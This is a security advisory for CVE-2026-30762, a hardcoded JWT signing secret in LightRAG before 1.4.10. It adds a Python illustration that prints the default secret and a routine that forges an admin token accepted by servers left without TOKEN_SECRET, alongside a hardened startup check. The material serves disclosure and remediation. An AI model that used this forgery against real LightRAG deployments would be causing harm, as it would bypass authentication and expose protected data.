PT-2026-30318 · Lightrag · Lightrag
Published
2026-04-04
·
Updated
2026-04-05
·
CVE-2026-30762
CVSS v3.1
7.5
High
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
Name of the Vulnerable Software and Affected Versions
LightRAG versions prior to 1.4.10
Description
A hardcoded JWT signing secret in LightRAG allows authentication bypass, potentially leading to unauthorized access. If the TOKEN_SECRET environment variable is not set, the API falls back to the default secret 'lightrag-jwt-default-secret'. Because this value is public in the source code, an attacker can forge JWTs that validate against it and reach protected endpoints without credentials. The vulnerable code is located in lightrag/api/config.py (line 397) and lightrag/api/auth.py (lines 24-25).
Recommendations
Require the TOKEN_SECRET environment variable to be explicitly set when authentication is configured. Refuse to start the API server if authentication is enabled but no custom secret is provided. Operators who deployed an affected version without TOKEN_SECRET should set a unique secret and treat any token issued under the default as compromised.
Fix
Fixed in LightRAG 1.4.10.
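The forgery path from the description and the startup check from the recommendations, as an added example that is not code from the LightRAG project or this advisory. It implements HS256 JWT signing and verification with the standard library so it runs offline; the claim names ("sub", "role", "exp"), the helper names, and the env-dict plumbing are assumptions made for illustration, since the page does not describe the project's actual token layout or validation logic. Only the default secret string and the TOKEN_SECRET variable name come from the advisory.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# The hardcoded fallback named in the advisory.
DEFAULT_SECRET = "lightrag-jwt-default-secret"


def _b64url(data: bytes) -> str:
    """JWT uses unpadded base64url."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def forge_token(secret: str, claims: dict) -> str:
    """Mint an HS256 JWT. Any party holding `secret` can do this, which is the whole problem."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def verify_token(secret: str, token: str) -> Optional[dict]:
    """Server-side check: pin the algorithm, constant-time HMAC compare, then expiry.
    Returns the claims on success, None on any failure."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(_b64url_decode(header_b64))
        if header.get("alg") != "HS256":  # reject alg=none and key-confusion attempts
            return None
        expected = hmac.new(secret.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
            return None
        claims = json.loads(_b64url_decode(payload_b64))
    except (ValueError, UnicodeDecodeError):
        return None
    if claims.get("exp", 0) < time.time():
        return None
    return claims


def resolve_secret(env: dict, auth_enabled: bool) -> str:
    """Vulnerable pattern (assumed shape, not the project's code): silently fall back to the default."""
    return env.get("TOKEN_SECRET") or DEFAULT_SECRET


def resolve_secret_hardened(env: dict, auth_enabled: bool) -> Optional[str]:
    """Recommended pattern: refuse to start when auth is on and no operator-chosen secret exists."""
    secret = env.get("TOKEN_SECRET")
    if auth_enabled and not secret:
        raise RuntimeError("TOKEN_SECRET must be set when authentication is enabled; refusing to start")
    return secret


def demo():
    """Returns (forged token accepted by default-config server, same token rejected by a server with its own secret)."""
    # Constructed scenario: server started with auth enabled but no TOKEN_SECRET in its environment.
    server_secret = resolve_secret({}, auth_enabled=True)
    # Attacker reads the default from the source tree and mints a privileged token (claims are assumed).
    forged = forge_token(DEFAULT_SECRET, {"sub": "admin", "role": "admin", "exp": int(time.time()) + 3600})
    accepted = verify_token(server_secret, forged) is not None
    rejected = verify_token("operator-chosen-random-secret", forged) is None
    return accepted, rejected


if __name__ == "__main__":
    print("forged token accepted / rejected:", demo())
```

The `resolve_secret_hardened` check is the one to wire into server startup: failing loudly at boot is preferable to a silent fallback, and it covers the empty-string case as well as the unset one.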
Weakness Enumeration
Improper Authentication
Related Identifiers
CVE-2026-30762
Affected Products
Lightrag